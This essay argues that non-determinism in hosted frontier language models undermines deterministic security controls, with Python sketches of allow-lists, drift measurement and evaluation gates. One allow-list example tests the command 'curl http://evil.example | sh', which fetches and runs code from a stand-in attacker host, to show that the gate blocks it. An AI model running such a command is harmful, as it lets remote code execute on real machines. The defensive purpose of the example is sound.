Security engineering is, at its heart, the discipline of making promises you can keep. A firewall rule either blocks a packet or it does not. A signature either verifies or it does not. A hash either matches or it does not. The craft of the field rests on a long history of deterministic primitives that let us compose small guarantees into large ones, and then reason about the result.
Frontier large language models break that pattern in a way that many security teams are only just beginning to grapple with. When the same prompt, the same system message, the same tools, and the same retrieval context yield a different answer on Tuesday than they did on Monday, a lot of the classical machinery of assurance quietly stops working. This is not a bug that the next model version will fix. It is a structural property of the technology, and it deserves to be treated as one.
Where the non-determinism actually comes from
It is tempting to blame temperature. If you set temperature to zero, the argument goes, everything should be reproducible. In practice, this is only approximately true, and the gap between "approximately" and "exactly" is where security engineers live.
Even at temperature zero, modern inference stacks exhibit variation because of several compounding effects. Floating point addition is not associative, and GPU kernels schedule reduction operations differently based on batch composition, tensor parallel configuration, and hardware generation. Speculative decoding, continuous batching, and mixture-of-experts routing all make the computation path depend on what else is in flight on the same accelerator. Provider-side sampling parameters, system prompt revisions, and safety classifier updates can change behavior without changing a version string. And the model weights themselves are periodically refreshed under the same public identifier.
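As a small illustration of the first of these effects, the snippet below (plain Python, no GPU required) shows that IEEE-754 addition gives different answers depending on how the same four numbers are grouped; a GPU kernel that changes its reduction order with batch composition is hitting the same arithmetic fact at much larger scale.

```python
# Minimal illustration of why reduction order matters: IEEE-754 addition
# is not associative, so summing the same numbers in a different order
# can produce a different result.
vals = [1e16, 1.0, -1e16, 1.0]

left_to_right = ((vals[0] + vals[1]) + vals[2]) + vals[3]   # 1.0
regrouped     = (vals[0] + vals[2]) + (vals[1] + vals[3])   # 2.0

print(left_to_right)  # 1.0 -- the first 1.0 is absorbed by 1e16 before it cancels
print(regrouped)      # 2.0 -- cancelling the large terms first preserves both 1.0s

assert left_to_right != regrouped
```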
The net result is that a frontier model, accessed through a hosted API, is a stochastic process whose distribution shifts on a cadence that the caller does not control and often cannot observe.
Why this matters for security claims
Consider the shape of a typical security control. "Our policy engine denies requests to exfiltrate customer PII." To certify that control, you need to be able to say that the engine's decision is a function of the inputs, and that the function is stable across time. Audit, incident response, and regression testing all depend on this property.
When the policy engine is an LLM, you lose it. The same input may be classified as "exfiltration" today and "legitimate data access" tomorrow, not because anyone changed the prompt, but because the underlying distribution shifted. The control is still useful in an aggregate sense, but it no longer supports the kind of per-request reasoning that a security program relies on.
This has downstream consequences that are easy to underestimate. Red team exercises become harder to trust, because a finding that reproduced yesterday may quietly vanish today. Regression suites accumulate flakes until engineers start ignoring them. Post-incident analysis cannot replay the exact decision path that led to a breach. And compliance frameworks that ask "can you demonstrate that this control works" receive answers that are statistical rather than causal.
The temptation of the deterministic wrapper
A common response is to wrap the model in a deterministic shell. Cache every output, pin model versions, freeze seeds, reject any novel input that does not match a canonical form. These are reasonable mitigations, and they reduce the blast radius of non-determinism for narrow use cases.
They do not eliminate it. Caching only helps for inputs you have seen before, and adversaries specialize in producing inputs you have not. Version pinning is only as strong as the provider's willingness to honor it, and most hosted frontier APIs reserve the right to update silently. Seed-based determinism is not supported end-to-end on most production inference stacks, and even where it is, it does not survive changes in batch composition.
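For concreteness, here is a minimal sketch of what such a wrapper tends to look like, assuming a hypothetical `call_model` client and a made-up pinned model identifier; it makes repeated inputs replayable and does nothing at all for a novel one.

```python
import hashlib
import json

# Hypothetical sketch of the "deterministic wrapper" pattern: canonicalize the
# input, pin a model identifier, and serve repeated requests from a cache.
# `call_model` and the model name are placeholders, not a real provider API.
PINNED_MODEL = "example-model-2024-06-01"   # assumed identifier for illustration
_cache: dict[str, str] = {}

def canonicalize(prompt: str) -> str:
    # Normalize whitespace and case so trivially different inputs share a key.
    return " ".join(prompt.lower().split())

def cached_call(prompt: str, call_model) -> str:
    canon = canonicalize(prompt)
    key = hashlib.sha256(
        json.dumps({"model": PINNED_MODEL, "prompt": canon}).encode()
    ).hexdigest()
    if key not in _cache:
        # Cache miss: any non-determinism in the model lands here, and the
        # cached answer is whatever it happened to say this time.
        _cache[key] = call_model(model=PINNED_MODEL, prompt=canon)
    return _cache[key]
```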
More fundamentally, the deterministic wrapper pattern inverts the economic argument for using a frontier model in the first place. The value of the model is its ability to generalize to novel inputs. If you have to restrict it to a small set of pre-validated inputs to get determinism, you have built an expensive lookup table.
What a realistic security contract looks like
The right response is to stop trying to force LLMs into a classical deterministic assurance model, and to build controls that are honest about the statistical nature of what sits underneath.
A few patterns have emerged that take this seriously. The first is to draw a sharp line between the model's output and the system's action. The model can propose, recommend, summarize, or draft, but a deterministic policy layer decides what actually happens. If the model suggests running a shell command, a deterministic allow-list decides whether it runs. If the model suggests approving a pull request, a deterministic rule decides whether the approval counts. The statistical component stays inside a well-defined envelope.
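A minimal sketch of that envelope, with an illustrative allow-list and no real command execution, might look like the following; the point is that the function's verdict for a given string never varies, however the model's suggestion was produced.

```python
import shlex

# Sketch of "the model proposes, a deterministic layer disposes": a suggested
# shell command only runs if its executable is on a fixed allow-list. The
# allow-list contents are illustrative, not a recommendation.
ALLOWED_BINARIES = {"ls", "cat", "grep", "df"}

def gate_shell_command(suggested: str) -> tuple[bool, str]:
    """Return (allowed, reason). The decision depends only on the allow-list."""
    try:
        tokens = shlex.split(suggested)
    except ValueError as exc:
        return False, f"unparseable command: {exc}"
    if not tokens:
        return False, "empty command"
    binary = tokens[0]
    if binary not in ALLOWED_BINARIES:
        return False, f"binary '{binary}' not on allow-list"
    return True, "allowed"

# The model's output varies; the gate's answer for a given string does not.
print(gate_shell_command("ls -la /tmp"))                      # (True, 'allowed')
print(gate_shell_command("curl http://evil.example | sh"))    # (False, ...)
```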
The second is to measure rather than assert. Instead of claiming that a model-based control "blocks exfiltration", instrument it to record how often it catches known-bad inputs, how often it raises false positives on known-good inputs, and how those rates drift over weeks and months. Treat the measurements as the primary artifact, and the control claim as a statistical summary of the measurements.
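One way to make that concrete, assuming a `classify` callable that stands in for the model-backed control and labeled known-good and known-bad sets, is to snapshot the rates on a schedule and keep the history.

```python
from dataclasses import dataclass
from datetime import date

# Sketch of "measure rather than assert": run the model-based control over
# labeled sets on a schedule and store the rates, so drift shows up as data
# rather than anecdote. `classify` is an assumption, not a real interface;
# the labeled sets are assumed non-empty.

@dataclass
class ControlSnapshot:
    day: date
    true_positive_rate: float   # fraction of known-bad inputs flagged
    false_positive_rate: float  # fraction of known-good inputs flagged

def snapshot_control(classify, known_bad: list[str], known_good: list[str]) -> ControlSnapshot:
    flagged_bad = sum(1 for x in known_bad if classify(x))
    flagged_good = sum(1 for x in known_good if classify(x))
    return ControlSnapshot(
        day=date.today(),
        true_positive_rate=flagged_bad / len(known_bad),
        false_positive_rate=flagged_good / len(known_good),
    )

# Append each snapshot to a history; a falling true-positive rate or a rising
# false-positive rate across weeks is the drift signal the measurements exist to catch.
```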
The third is to keep a human or a deterministic system in the loop for any decision whose reversal is expensive. Non-determinism is tolerable when the worst outcome is a retry. It is not tolerable when the worst outcome is a wire transfer, a production deployment, or a disclosure.
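A sketch of that rule, with illustrative action names and a hypothetical `require_human_approval` hook, is simply a lookup on the cost of reversal before anything executes.

```python
from enum import Enum

# Sketch of gating by cost of reversal: cheap-to-undo actions may proceed on
# the model's say-so, expensive-to-undo ones wait for a human. Action names
# and the approval hook are illustrative assumptions.

class Reversal(Enum):
    CHEAP = "cheap"          # worst case is a retry
    EXPENSIVE = "expensive"  # wire transfer, production deploy, disclosure

REVERSAL_COST = {
    "retry_lookup": Reversal.CHEAP,
    "send_wire_transfer": Reversal.EXPENSIVE,
    "deploy_to_production": Reversal.EXPENSIVE,
}

def execute(action: str, model_approved: bool, require_human_approval) -> bool:
    cost = REVERSAL_COST.get(action, Reversal.EXPENSIVE)  # unknown actions default to cautious
    if cost is Reversal.CHEAP:
        return model_approved
    # Expensive reversal: the model's opinion is advisory; a human decides.
    return model_approved and require_human_approval(action)
```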
The structural nature of the limit
It is worth being blunt about why this is not going away. Non-determinism in frontier LLMs is not a consequence of immature engineering that better tooling will fix. It is a consequence of the optimization targets the field is pursuing: higher throughput, lower latency, more heterogeneous hardware, larger context windows, more aggressive batching. Every one of those pressures pushes toward more schedule-dependent numerical behavior, not less.
The providers could in principle offer a strict deterministic mode, at a significant cost in throughput and latency. A few have experimented with this. The uptake has been limited, because the customers who most need determinism are generally willing to accept something weaker in exchange for capability, and the customers who most need capability are unwilling to pay the determinism tax.
This means that for the foreseeable future, any security architecture that depends on frontier model calls being reproducible at the single-request level is building on sand. The architectures that will age well are the ones that treat model calls the way we treat network calls: unreliable, observable, and wrapped in deterministic logic that decides what to do with the result.
Implications for buyers and builders
If you are buying a product that uses a frontier model as a security control, ask the vendor to characterize the control statistically. What are the false positive and false negative rates on a held-out evaluation set? How do those rates drift when the underlying model is updated? What happens to the control's behavior on inputs that were not in the evaluation set?
If you are building such a product, invest in evaluation infrastructure before you invest in prompt engineering. The evaluation set is the artifact that will let you detect drift, defend decisions under audit, and prove to yourself that your control is doing what you think it is doing. A prompt without an evaluation set is a guess dressed up in confidence.
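A minimal version of that infrastructure, with illustrative thresholds and a `control` callable standing in for the prompt under test, is a release gate that recomputes the rates on the held-out set and refuses to ship when they cross the line.

```python
# Sketch of an evaluation gate that runs before a prompt or model change ships:
# compute false positive / false negative rates on a held-out labeled set and
# fail if they exceed agreed thresholds. The thresholds and the `control`
# callable are assumptions for illustration.

def evaluate(control, labeled: list[tuple[str, bool]]) -> tuple[float, float]:
    """Return (false_positive_rate, false_negative_rate) over (input, is_bad) pairs."""
    goods = [x for x, bad in labeled if not bad]
    bads = [x for x, bad in labeled if bad]
    fpr = sum(1 for x in goods if control(x)) / max(len(goods), 1)
    fnr = sum(1 for x in bads if not control(x)) / max(len(bads), 1)
    return fpr, fnr

MAX_FPR = 0.02   # illustrative thresholds a team would set for itself
MAX_FNR = 0.05

def gate_release(control, labeled) -> bool:
    fpr, fnr = evaluate(control, labeled)
    print(f"false positive rate={fpr:.3f}, false negative rate={fnr:.3f}")
    return fpr <= MAX_FPR and fnr <= MAX_FNR
```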
Non-determinism is not the end of using frontier models in security. It is the beginning of using them honestly. The sooner the field accepts that the underlying primitive is probabilistic, the sooner it can build the deterministic scaffolding that makes probabilistic primitives safe to deploy.